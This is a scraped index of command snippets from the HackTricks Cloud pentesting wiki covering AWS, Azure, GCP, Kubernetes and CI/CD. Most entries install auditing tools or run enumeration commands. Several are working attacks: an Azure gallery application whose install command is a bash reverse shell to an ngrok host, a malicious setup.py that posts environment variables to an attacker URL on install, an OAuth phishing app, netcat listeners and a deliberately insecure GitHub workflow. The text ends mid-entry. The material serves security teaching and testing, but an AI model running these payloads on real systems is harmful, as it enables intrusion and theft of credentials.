### Install Starbase with Docker Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/pentesting-cloud-methodology.md Clone the Starbase repository, copy the example configuration, build the Docker image, and run setup and run commands using Docker Compose. This method is an alternative to local Node.js installation. ```bash # Docker git clone https://github.com/JupiterOne/starbase.git cd starbase cp config.yaml.example config.yaml # Configure manually config.yaml depending on the env to analyze docker build --no-cache -t starbase:latest . docker-compose run starbase setup docker-compose run starbase run ``` -------------------------------- ### Install Vertex AI SDK Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-vertex-ai-privesc.md Initial setup required to interact with Vertex AI services via Python. ```bash # Install the Vertex AI SDK first pip install google-cloud-aiplatform ``` -------------------------------- ### Start Stormspotter Backend Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-enumeration-tools.md Starts the Stormspotter backend service. Ensure you are in the correct directory and have pipenv installed. ```bash cd stormspotter\backend\ pipenv shell python ssbackend.pyz ``` -------------------------------- ### Run OAuth Phishing Example Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md Clones the repository, installs dependencies, and executes the application with provided client credentials. ```bash git clone ttps://github.com/carlospolop/gcp_oauth_phishing_example cd gcp_oauth_phishing_example pip install flask requests google-auth-oauthlib python3 app.py --client-id "" --client-secret "" ``` -------------------------------- ### Setup SAML Federation Environment Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md Sets up a Python virtual environment and installs necessary libraries for forging IdP metadata and SAML assertions. ```bash python3 -m venv /tmp/saml-federation-venv source /tmp/saml-federation-venv/bin/activate pip install lxml signxml ``` -------------------------------- ### Install and run Steampipe for Kubernetes compliance Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md Use these commands to install Steampipe and Powerpipe, initialize the compliance module, and start the dashboard server. ```bash # Install Steampipe brew install turbot/tap/powerpipe brew install turbot/tap/steampipe steampipe plugin install kubernetes # Start the service steampipe service start # Install the module mkdir dashboards cd dashboards powerpipe mod init powerpipe mod install github.com/turbot/steampipe-mod-kubernetes-compliance # Run the module powerpipe server ``` -------------------------------- ### Install and run Kubescape Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md Install the Kubescape CLI and execute a security scan on the cluster. ```bash curl -s https://raw.githubusercontent.com/kubescape/kubescape/master/install.sh | /bin/bash kubescape scan --verbose ``` -------------------------------- ### Start Stormspotter Frontend Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-enumeration-tools.md Starts the Stormspotter frontend service. Ensure you are in the correct directory. ```bash cd stormspotter\frontend\dist\spa\ quasar.cmd serve -p 9091 --history ``` -------------------------------- ### Install ScoutSuite Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/pentesting-cloud-methodology.md Sets up a virtual environment and installs ScoutSuite via pip. ```bash mkdir scout; cd scout virtualenv -p python3 venv source venv/bin/activate pip install scoutsuite scout --help ## Using Docker: https://github.com/nccgroup/ScoutSuite/wiki/Docker-Image ``` -------------------------------- ### Run HackTricks Cloud Locally Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/README.md Clones the repository and starts the application in a Docker container. Ensure Docker is installed and the environment variable for language is set correctly. ```bash # Download latest version of hacktricks cloud git clone https://github.com/HackTricks-wiki/hacktricks-cloud # Select the language you want to use export LANG="master" # Leave master for English # "af" for Afrikaans # "de" for German # "el" for Greek # "es" for Spanish # "fr" for French # "hi" for Hindi # "it" for Italian # "ja" for Japanese # "ko" for Korean # "pl" for Polish # "pt" for Portuguese # "sr" for Serbian # "sw" for Swahili # "tr" for Turkish # "uk" for Ukrainian # "zh" for Chinese # Run the docker container indicating the path to the hacktricks-cloud folder docker run -d --rm --platform linux/amd64 -p 3377:3000 --name hacktricks_cloud -v $(pwd)/hacktricks-cloud:/app ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image bash -c "mkdir -p ~/.ssh && ssh-keyscan -H github.com >> ~/.ssh/known_hosts && cd /app && git checkout $LANG && git pull && MDBOOK_PREPROCESSOR__HACKTRICKS__ENV=dev mdbook serve --hostname 0.0.0.0" ``` -------------------------------- ### Install and Run CloudSploit Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/pentesting-cloud-methodology.md Instructions for cloning the repository, installing dependencies, and running the help command. ```bash # Install git clone https://github.com/aquasecurity/cloudsploit.git cd cloudsploit npm install ./index.js -h ## Docker instructions in github ``` -------------------------------- ### Install Starbase with Node.js Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/pentesting-cloud-methodology.md Install Node.js version 14 using nvm, then clone the Starbase repository, install dependencies, and run the help command. Starbase collects assets and relationships into a Neo4j graph. ```bash # You are going to need Node version 14, so install nvm following https://tecadmin.net/install-nvm-macos-with-homebrew/ npm install --global yarn nvm install 14 git clone https://github.com/JupiterOne/starbase.git cd starbase nvm use 14 yarn install yarn starbase --help # Configure manually config.yaml depending on the env to analyze yarn starbase setup yarn starbase run ``` -------------------------------- ### Install and Use Cognito Scanner Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md Commands for installing and displaying help for the Cognito Scanner CLI tool. ```bash $ pip install cognito-scanner ``` ```bash $ cognito-scanner --help ``` -------------------------------- ### Install and Use Pacu Framework Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/README.md Installation and CLI usage for the Pacu AWS exploitation framework. ```bash # Install ## Feel free to use venvs pip3 install pacu # Use pacu CLI pacu > import_keys # import 1 profile from .aws/credentials > import_keys --all # import all profiles > list # list modules > exec iam__enum_permissions # Get permissions > exec iam__privesc_scan # List privileged permissions ``` -------------------------------- ### Install Cloudlist Tool Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/pentesting-cloud-methodology.md Download, unzip, and install the Cloudlist tool to your system's PATH. This tool is used for discovering assets in cloud environments. ```bash cd /tmp wget https://github.com/projectdiscovery/cloudlist/releases/latest/download/cloudlist_1.0.1_macOS_arm64.zip unzip cloudlist_1.0.1_macOS_arm64.zip chmod +x cloudlist sudo mv cloudlist /usr/local/bin ``` -------------------------------- ### Install Kubesec Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md Instructions for installing Kubesec, a tool for scanning Kubernetes configurations. Download binaries from GitHub releases. ```bash # Install Kubesec ## Download from https://github.com/controlplaneio/kubesec/releases ``` -------------------------------- ### Create Gallery Application for Linux Reverse Shell Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md This example demonstrates creating an Azure Compute Gallery application with a Linux reverse shell payload. It includes steps for creating the gallery, the application container, and the application version with install, remove, and update commands. ```bash # Create gallery (if the isn't any) az sig create --resource-group myResourceGroup \ --gallery-name myGallery --location "West US 2" ``` ```bash # Create application container az sig gallery-application create \ --application-name myReverseShellApp \ --gallery-name myGallery \ --resource-group \ --os-type Linux \ --location "West US 2" ``` ```bash # Create app version with the rev shell ## In Package file link just add any link to a blobl storage file az sig gallery-application version create \ --version-name 1.0.2 \ --application-name myReverseShellApp \ --gallery-name myGallery \ --location "West US 2" \ --resource-group \ --package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \ --install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \ --remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \ --update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" ``` -------------------------------- ### Install Steampipe Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/pentesting-cloud-methodology.md Installs Steampipe using Homebrew. ```bash brew tap turbot/tap brew install steampipe ``` -------------------------------- ### Install PurplePanda Tool Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/pentesting-cloud-methodology.md Installs the PurplePanda tool, sets up a virtual environment, installs dependencies, and configures the Neo4j connection URL and password. Ensure Neo4j is installed and running separately. ```bash git clone https://github.com/carlospolop/PurplePanda cd PurplePanda python3 -m venv . source bin/activate python3 -m pip install -r requirements.txt export PURPLEPANDA_NEO4J_URL="bolt://neo4j@localhost:7687" export PURPLEPANDA_PWD="neo4j_pwd_4_purplepanda" python3 main.py -h # Get help ``` -------------------------------- ### Install and Use Cloudsplaining Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/README.md Installation and policy download commands for assessing IAM security and least privilege violations. ```bash # Install pip install cloudsplaining # Download IAM policies to check ## Only the ones attached with the versions used cloudsplaining download --profile dev ``` -------------------------------- ### Start MySQL Server Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.md Starts a stopped MySQL Flexible Server instance to restore availability. ```bash az mysql flexible-server start \ --name \ --resource-group ``` -------------------------------- ### Install FlareProx and Dependencies Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/cloudflare-security/cloudflare-workers-pass-through-proxy-ip-rotation.md Clone the FlareProx repository and install its Python dependencies using pip. ```bash git clone https://github.com/MrTurvey/flareprox cd flareprox pip install -r requirements.txt ``` -------------------------------- ### Install and Run terraform-compliance Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/terraform-security.md Installs terraform-compliance via pip, generates a Terraform plan, and then runs the compliance check on a folder. ```bash pip install terraform-compliance terraform plan -out=plan.out terraform-compliance -f /path/to/folder ``` -------------------------------- ### Install cbt CLI Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-bigtable-post-exploitation.md Install the `cbt` CLI using the Cloud SDK. This tool is necessary for interacting with Bigtable tables directly. ```bash gcloud components install cbt ``` -------------------------------- ### Install and Configure Cartography Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/README.md Installation instructions and command to fetch AWS information using a Neo4j database backend. ```bash # Install pip install cartography ## At the time of this writting you need neo4j version 3.5.* # Get AWS info AWS_PROFILE=dev cartography --neo4j-uri bolt://127.0.0.1:7687 --neo4j-password-prompt --neo4j-user neo4j ``` -------------------------------- ### Install Azure Desktop Virtualization Extension Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-services/az-virtual-desktop.md Before enumerating Azure Virtual Desktop resources, ensure you have the 'desktopvirtualization' extension installed for Azure CLI. This is a prerequisite for all subsequent commands. ```bash az extension add --name desktopvirtualization ``` -------------------------------- ### Initialize Serverless Project Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/serverless.com-security.md Commands to install the CLI, create a project directory, and generate a template. ```bash # Create temp folder for the tutorial mkdir /tmp/serverless-tutorial cd /tmp/serverless-tutorial # Install Serverless cli npm install -g serverless # Generate template serverless #Choose first one (AWS / Node.js / HTTP API) ## Indicate a name like "Tutorial" ## Login/Register ## Create A New App ## Indicate a name like "tutorialapp) ``` -------------------------------- ### Start PostgreSQL Flexible Server Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.md Start a stopped Azure PostgreSQL Flexible Server instance. Requires 'Microsoft.DBforPostgreSQL/flexibleServers/start/action' permission. ```bash az postgres flexible-server start \ --name \ --resource-group ``` -------------------------------- ### Start Local etcd with Snapshot Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md Starts a local etcd instance using a restored snapshot, allowing direct interaction with the historical etcd data. ```bash etcd \ --data-dir=./restore \ --initial-cluster=state=existing \ --snapshot='./etcd-loot-backup.db' ``` -------------------------------- ### List and Describe SQL Instances Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md Use these commands to list all SQL instances in your project and describe a specific instance to retrieve its details like IPs and certificates. ```bash gcloud sql instances list gcloud sql instances describe # get IPs, CACert, settings ``` -------------------------------- ### Send GET Request via Worker Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/cloudflare-security/cloudflare-workers-pass-through-proxy-ip-rotation.md Example of sending a GET request through a Cloudflare Worker to a specified URL. ```bash # GET curl "https://your-worker.account.workers.dev?url=https://httpbin.org/get" ``` -------------------------------- ### Get Refresh and Access Token Example Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md This Python script uses the MSAL library to perform a device code flow authentication for the Microsoft Graph API. It then shows how to decode the JWT access token and acquire new tokens using a refresh token. Ensure you have the 'msal', 'requests', and 'jwt' libraries installed. ```python # Code example from https://github.com/secureworks/family-of-client-ids-research import msal import requests import jwt from pprint import pprint from typing import Any, Dict, List # LOGIN VIA CODE FLOW AUTHENTICATION azure_cli_client = msal.PublicClientApplication( "00b41c95-dab0-4487-9791-b9d2c32c80f2" # ID for Office 365 Management ) device_flow = azure_cli_client.initiate_device_flow( scopes=["https://graph.microsoft.com/.default"] ) print(device_flow["message"]) # Perform device code flow authentication azure_cli_bearer_tokens_for_graph_api = azure_cli_client.acquire_token_by_device_flow( device_flow ) pprint(azure_cli_bearer_tokens_for_graph_api) # DECODE JWT def decode_jwt(base64_blob: str) -> Dict[str, Any]: """Decodes base64 encoded JWT blob""" return jwt.decode( base64_blob, options={"verify_signature": False, "verify_aud": False} ) decoded_access_token = decode_jwt( azure_cli_bearer_tokens_for_graph_api.get("access_token") ) pprint(decoded_access_token) # GET NEW ACCESS TOKEN AND REFRESH TOKEN new_azure_cli_bearer_tokens_for_graph_api = ( # Same client as original authorization azure_cli_client.acquire_token_by_refresh_token( azure_cli_bearer_tokens_for_graph_api.get("refresh_token"), # Same scopes as original authorization scopes=["https://graph.microsoft.com/.default"], ) ) pprint(new_azure_cli_bearer_tokens_for_graph_api) ``` -------------------------------- ### Install and Run tfsec Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/terraform-security.md Installs tfsec using Homebrew and then runs a static analysis scan on a specified folder of Terraform code. ```bash brew install tfsec tfsec /path/to/folder ``` -------------------------------- ### Install and Use Principal Mapper (PMapper) Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/README.md Commands for installing PMapper, generating graph data, and performing IAM privilege escalation analysis. ```bash # Install pip install principalmapper # Get data pmapper --profile dev graph create pmapper --profile dev graph display # Show basic info # Generate graph pmapper --profile dev visualize # Generate svg graph file (can also be png, dot and graphml) pmapper --profile dev visualize --only-privesc # Only privesc permissions # Generate analysis pmapper --profile dev analysis ## Run queries pmapper --profile dev query 'who can do iam:CreateUser' pmapper --profile dev query 'preset privesc *' # Get privescs with admins # Get organization hierarchy data pmapper --profile dev orgs create pmapper --profile dev orgs display ``` -------------------------------- ### Get Installed VM Extensions (PowerShell) Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-services/vms/README.md Lists all extensions installed on a specific virtual machine. Requires VM name and resource group. ```powershell Get-AzVMExtension -ResourceGroupName -VMName ``` -------------------------------- ### Create VM instance from image Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md Launches a new VM instance using an image from a source project. ```bash gcloud compute instances create [INSTANCE_NAME] \ --project=[TARGET_PROJECT_ID] \ --zone=[ZONE] \ --image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME] ``` -------------------------------- ### Install and Configure Steampipe for Azure Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-enumeration-tools.md Install Steampipe and Powerpipe, configure Azure plugins, and set environment variables for authentication. This setup is used for running Azure compliance and insights modules. ```bash # Install brew install turbot/tap/powerpipe brew install turbot/tap/steampipe steampipe plugin install azure steampipe plugin install azuread # Config creds via env vars or az cli default creds will be used export AZURE_ENVIRONMENT="AZUREPUBLICCLOUD" export AZURE_TENANT_ID="" export AZURE_SUBSCRIPTION_ID="" export AZURE_CLIENT_ID="" export AZURE_CLIENT_SECRET="" # Run steampipe-mod-azure-insights cd /tmp mkdir dashboards cd dashboards powerpipe mod init powerpipe mod install github.com/turbot/steampipe-mod-azure-insights steampipe service start powerpipe server # Go to http://localhost:9033 in a browser ``` -------------------------------- ### Kubernetes API Verb Requests Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md Examples of HTTP requests for get, list, and watch operations on deployment resources. ```http GET /apis/apps/v1/namespaces/{namespace}/deployments/{name} ``` ```http #In a namespace GET /apis/apps/v1/namespaces/{namespace}/deployments #In all namespaces GET /apis/apps/v1/deployments ``` ```http GET /apis/apps/v1/deployments?watch=true GET /apis/apps/v1/watch/namespaces/{namespace}/deployments?watch=true GET /apis/apps/v1/watch/namespaces/{namespace}/deployments/{name} [DEPRECATED] GET /apis/apps/v1/watch/namespaces/{namespace}/deployments [DEPRECATED] GET /apis/apps/v1/watch/deployments [DEPRECATED] ``` -------------------------------- ### Get User ImmutableId Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.md Retrieves the ImmutableId for an on-premises user in Azure AD. This is the unique identifier derived from the on-premises GUID. ```powershell # Get the ImmutableId of an on-prem user in Azure AD (this is the Unique Identifier derived from on-prem GUID) Get-AADIntUser -UserPrincipalName onpremadmin@domain.onmicrosoft.com | select ImmutableId ``` -------------------------------- ### Create setup.py File for Python Library Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md Defines the metadata for a Python package, including its name, version, and dependencies, enabling it to be built and uploaded. ```python # setup.py from setuptools import setup, find_packages setup( name='hello_world', version='0.1', packages=find_packages(), install_requires=[ # Any dependencies your library needs ], ) ``` -------------------------------- ### Describe AWS Organization Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md Use this command to get information about your AWS Organization. No specific setup is required beyond having AWS CLI configured. ```bash aws organizations describe-organization ``` -------------------------------- ### Create VM with reverse shell in metadata Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md Launches a VM with a startup script in the metadata to execute a reverse shell. ```bash --metadata startup-script='#! /bin/bash echo "hello"; ' ``` -------------------------------- ### Request Signing Using Python Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md Python code example using the `requests` and `requests-aws4auth` libraries to sign requests for API Gateway. Ensure you have `boto3` installed as well. ```python pip install requests pip install requests-aws4auth pip install boto3 import boto3 import requests from requests_aws4auth import AWS4Auth region = 'us-east-1' # Region service = 'execute-api' access_key = 'YOUR_ACCESS_KEY' secret_key = 'YOUR_SECRET_KEY' url = 'https://.execute-api.us-east-1.amazonaws.com//' session = boto3.Session(aws_access_key_id=access_key, aws_secret_access_key=secret_key) credentials = session.get_credentials() awsauth = AWS4Auth(credentials.access_key, credentials.secret_key, region, service, session_token=credentials.token) response = requests.get(url, auth=awsauth) print(response.text) ``` -------------------------------- ### List App Engine Versions Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md Lists all deployed versions for a Google App Engine application. No specific setup is required beyond having the gcloud CLI installed and authenticated. ```bash gcloud app versions list ``` -------------------------------- ### List Azure Management Groups Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md Use this command to list all management groups in your Azure environment. No specific setup is required beyond having the Azure CLI installed and authenticated. ```bash az account management-group list ``` -------------------------------- ### Create Malicious setup.py Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md Define a setup.py file that executes malicious code during the installation process. ```python cat > setup.py << 'EOF' import setuptools from setuptools.command.install import install import os import urllib.request import urllib.parse def malicious_function(): data = dict(os.environ) encoded_data = urllib.parse.urlencode(data).encode() url = 'https:///exfil' req = urllib.request.Request(url, data=encoded_data) urllib.request.urlopen(req) class AfterInstall(install): def run(self): install.run(self) malicious_function() setuptools.setup( name = "", version = "0.1.1", packages = [""], cmdclass={'install': AfterInstall}, ) EOF ``` -------------------------------- ### Create SageMaker Notebook Instance Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md Initializes a new notebook instance with a specified IAM role. ```bash aws sagemaker create-notebook-instance --notebook-instance-name example \ --instance-type ml.t2.medium \ --role-arn arn:aws:iam:::role/service-role/ ``` -------------------------------- ### Configure .bashrc for Automatic Proxy Startup Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md Adds commands to the .bashrc file to automatically install Squid, configure it, start the service, and expose it via ngrok upon shell startup. ```bash sudo apt install -y squid sudo cp squid.conf /etc/squid/ sudo service squid start cd ngrok;./ngrok tcp 3128 ``` -------------------------------- ### Get Insight Rule Report Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md Retrieves a report of data collected over a specified time range for a Contributor Insight rule. Requires rule name, start time, end time, and period. ```bash aws cloudwatch get-insight-rule-report --rule-name --start-time --end-time --period ``` -------------------------------- ### List Compute Instance Templates Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md Lists all available instance templates in the project. This is useful for discovering configurations used to deploy consistent VM instances. ```bash gcloud compute instance-templates list ``` -------------------------------- ### Describe Auto Scaling Launch Configurations Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md List all launch configurations used by Auto Scaling groups. This provides details on how instances are launched. ```bash aws autoscaling describe-launch-configurations ``` -------------------------------- ### Workflow HTTP Request with OIDC Token Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md Example of a Workflow step making an HTTP GET request using OIDC authentication. This allows interaction with services like Cloud Functions by specifying an audience. ```yaml - step_A: call: http.get args: url: https://us-central1-project.cloudfunctions.net/functionA query: firstNumber: 4 secondNumber: 6 operation: sum auth: type: OIDC audience: OIDC_AUDIENCE ``` -------------------------------- ### List Azure Virtual Networks (VNets) with Azure CLI Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md Lists all VNets in an Azure account, displaying their name, location, and address space. No specific setup is required beyond having the Azure CLI installed and authenticated. ```bash # List VNets az network vnet list --query "[].{name:name, location:location, addressSpace:addressSpace}" ``` -------------------------------- ### Start Interactive Session on EC2 Instances via SSM StartSession Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc/README.md Utilize `ssm:StartSession` to initiate an SSH-like interactive session with an EC2 instance. The Session Manager Plugin must be installed on the client machine to use this functionality. ```bash aws ssm describe-instance-information aws ssm describe-sessions --state Active ``` ```bash aws ssm start-session --target "$INSTANCE_ID" ``` -------------------------------- ### Setup RDS Proxy Lab Environment Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation/README.md Commands to create a minimal lab environment for testing RDS proxy credential harvesting. ```bash REGION=us-east-1 ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text) SECRET_ARN=$(aws secretsmanager create-secret \ --region $REGION --name rds/proxy/aurora-demo \ --secret-string username:admin \ --query ARN --output text) aws iam create-role --role-name rds-proxy-secret-role \ --assume-role-policy-document Version:2012-10-17 aws iam attach-role-policy --role-name rds-proxy-secret-role \ --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite aws rds create-db-proxy --db-proxy-name p0 --engine-family MYSQL \ --auth [AuthScheme:SECRETS] \ --role-arn arn:aws:iam::$ACCOUNT_ID:role/rds-proxy-secret-role \ --vpc-subnet-ids $(aws ec2 describe-subnets --filters Name=default-for-az,Values=true --query Subnets[].SubnetId --output text) aws rds wait db-proxy-available --db-proxy-name p0 ``` -------------------------------- ### Create Installation Access Token Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/github-security/README.md Requests an installation-specific access token using a valid JWT. ```bash INSTALL_ID=12345678 curl -sS -X POST \ -H "Authorization: Bearer $JWT" \ -H "Accept: application/vnd.github+json" \ -H "X-GitHub-Api-Version: 2022-11-28" \ https://api.github.com/app/installations/$INSTALL_ID/access_tokens ``` -------------------------------- ### Host Payload and Setup Netcat Listener Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.md Starts a Python SimpleHTTPServer on port 80 to host the payload and a Netcat listener on port 443 to capture incoming reverse shell connections. This is typically done on the attacker's Kali machine. ```bash sudo python -m SimpleHTTPServer 80 ``` ```bash sudo nc -nlvp 443 ``` -------------------------------- ### Set up ScoutSuite Environment Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-enumeration-tools.md Create a Python virtual environment, activate it, install ScoutSuite, and view its help information. ScoutSuite is a multi-cloud security auditing tool for assessing cloud environments. ```bash virtualenv -p python3 venv source venv/bin/activate pip install scoutsuite scout --help # Use --cli flag to use az cli credentials # Use --user-account to have scout prompt for user credentials # Use --user-account-browser to launch a browser to login ``` -------------------------------- ### Checkout Pull Request Code in `pull_request_target` Workflow Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md This example demonstrates an insecure configuration where a `pull_request_target` workflow explicitly checks out code from the PR's head commit. This can lead to arbitrary code execution if the workflow runs build scripts or installs packages controlled by the PR author. ```yaml # INSECURE. Provided as an example only. on: pull_request_target jobs: build: name: Build and test runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 with: ref: ${{ github.event.pull_request.head.sha }} - uses: actions/setup-node@v1 - run: | npm install npm build - uses: completely/fakeaction@v2 with: arg1: ${{ secrets.supersecret }} - uses: fakerepo/comment-on-pr@v1 with: message: | Thank you! ``` -------------------------------- ### Kubernetes CSR Approver ClusterRole Example Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md This YAML defines a ClusterRole for approving Certificate Signing Requests (CSRs) in Kubernetes. It grants permissions to get, list, watch, create CSRs, update CSR approvals, and approve specific signers. Ensure the 'resourceNames' match your signer configuration. ```yaml apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: name: csr-approver rules: - apiGroups: - certificates.k8s.io resources: - certificatesigningrequests verbs: - get - list - watch - create - apiGroups: - certificates.k8s.io resources: - certificatesigningrequests/approval verbs: - update - apiGroups: - certificates.k8s.io resources: - signers resourceNames: - example.com/my-signer-name # example.com/* can be used to authorize for all signers in the 'example.com' domain verbs: - approve ``` -------------------------------- ### Install Homebrew on macOS Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-enumeration-tools.md Installs Homebrew, a package manager for macOS, which is a prerequisite for installing PowerShell. ```bash /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ``` -------------------------------- ### Deploy SQL Queries via GitHub Actions Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-services/az-mysql.md Setup and execution commands for running SQL files against a server using GitHub repository integration. ```bash # Setup az mysql flexible-server deploy setup \ -s \ -g \ -u \ -p "" \ --sql-file \ --repo \ --branch \ --action-name \ --allow-push # Run it az mysql flexible-server deploy run \ --action-name \ --branch ``` -------------------------------- ### Enumerate MLflow Servers, Autopilot, and JumpStart Source: 